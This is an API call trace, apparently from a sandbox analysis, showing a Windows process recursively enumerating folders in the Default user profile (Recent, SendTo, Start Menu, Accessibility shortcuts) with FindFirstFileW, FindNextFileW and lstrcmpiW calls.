	[0102.352] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8bc0c61e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1
	[0102.352] lstrcmpiW (lpString1="AutomaticDestinations", lpString2=".") returned 1
	[0102.352] lstrcmpiW (lpString1="AutomaticDestinations", lpString2="..") returned 1
	[0102.352] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\AutomaticDestinations\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8bc0c61e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.353] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.353] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8bc0c61e, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.353] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.353] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.353] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8bf51190, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 1
	[0102.353] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8bf51190, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.automaticDestinations-ms", cAlternateFileName="1B4DD6~1.AUT")) returned 0
	[0102.353] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.353] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8c036ca6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1
	[0102.353] lstrcmpiW (lpString1="CustomDestinations", lpString2=".") returned 1
	[0102.353] lstrcmpiW (lpString1="CustomDestinations", lpString2="..") returned 1
	[0102.353] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8c036ca6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.354] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.354] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa0a61060, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8c036ca6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.354] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.355] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.355] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8c036ca6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1
	[0102.355] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8afff6a8, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x3c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1
	[0102.355] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8c036ca6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1
	[0102.355] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x8c036ca6, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 0
	[0102.355] FindClose (in: hFindFile=0x213b70 | out: hFindFile=0x213b70) returned 1
	[0102.356] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.356] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0b91b60, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b91b60, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4f027ae, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0102.356] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.356] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa0d2d6a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89a20c60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1
	[0102.356] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1
	[0102.356] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1
	[0102.356] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\SendTo\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa0d2d6a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89a20c60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.357] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.357] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa0d2d6a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89a20c60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.357] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.357] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93a8df1e, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x3994541c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x593d1889, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x189926fc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop (create shortcut).DeskLink", cAlternateFileName="DESKTO~1.DES")) returned 1
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x935f149d, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b7c02b7, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x22e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa0b6ba00, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x89a20c60, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents.mydocs", cAlternateFileName="DOCUME~1.MYD")) returned 1
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79a156, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x7b79a156, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x593d1889, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x18bf3cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 1
	[0102.358] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x593d1889, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x18bf3cfc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mail Recipient.MAPIMail", cAlternateFileName="MAILRE~1.MAP")) returned 0
	[0102.358] FindClose (in: hFindFile=0x213b30 | out: hFindFile=0x213b30) returned 1
	[0102.359] FindNextFileW (in: hFindFile=0x213af0, lpFindFileData=0x127910 | out: lpFindFileData=0x127910*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0d2d6a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0102.359] lstrcmpiW (lpString1="Start Menu", lpString2=".") returned 1
	[0102.359] lstrcmpiW (lpString1="Start Menu", lpString2="..") returned 1
	[0102.359] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\*", lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0d2d6a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b30
	[0102.360] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.360] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0d2d6a, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.360] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.360] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.360] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa0b6ba00, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4eb64ee, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0102.360] FindNextFileW (in: hFindFile=0x213b30, lpFindFileData=0x126e90 | out: lpFindFileData=0x126e90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 1
	[0102.360] lstrcmpiW (lpString1="Programs", lpString2=".") returned 1
	[0102.360] lstrcmpiW (lpString1="Programs", lpString2="..") returned 1
	[0102.360] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\*", lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213b70
	[0102.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.361] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0bdde20, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xb4edc64e, ftLastWriteTime.dwHighDateTime=0x1cb88fb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.361] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.361] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.361] FindNextFileW (in: hFindFile=0x213b70, lpFindFileData=0x126410 | out: lpFindFileData=0x126410*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6f762f74, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~1")) returned 1
	[0102.361] lstrcmpiW (lpString1="Accessories", lpString2=".") returned 1
	[0102.361] lstrcmpiW (lpString1="Accessories", lpString2="..") returned 1
	[0102.362] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\*", lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6f762f74, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213bb0
	[0102.363] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.363] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6f762f74, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.363] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.363] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.363] FindNextFileW (in: hFindFile=0x213bb0, lpFindFileData=0x125990 | out: lpFindFileData=0x125990*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x63053e46, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1
	[0102.363] lstrcmpiW (lpString1="Accessibility", lpString2=".") returned 1
	[0102.363] lstrcmpiW (lpString1="Accessibility", lpString2="..") returned 1
	[0102.363] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Accessories\\\\Accessibility\\\\*", lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x63053e46, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x213bf0
	[0102.365] lstrcmpiW (lpString1=".", lpString2=".") returned 0
	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa0f8ec9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa0b6ba00, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x63053e46, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.365] lstrcmpiW (lpString1="..", lpString2=".") returned 1
	[0102.365] lstrcmpiW (lpString1="..", lpString2="..") returned 0
	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x93558f21, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x63053e46, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x2c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1
	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x625779d2, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6259db32, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x54e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ease of Access.lnk", cAlternateFileName="EASEOF~1.LNK")) returned 1
	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x623d4aaf, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x623d4aaf, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="Magnify.lnk", cAlternateFileName="")) returned 1
	[0102.365] FindNextFileW (in: hFindFile=0x213bf0, lpFindFileData=0x124f10 | out: lpFindFileData=0x124f10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6302dce6, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xa0b458a0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0x6302dce6, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="Narrator.lnk", cAlternateFileName="")) returned 1
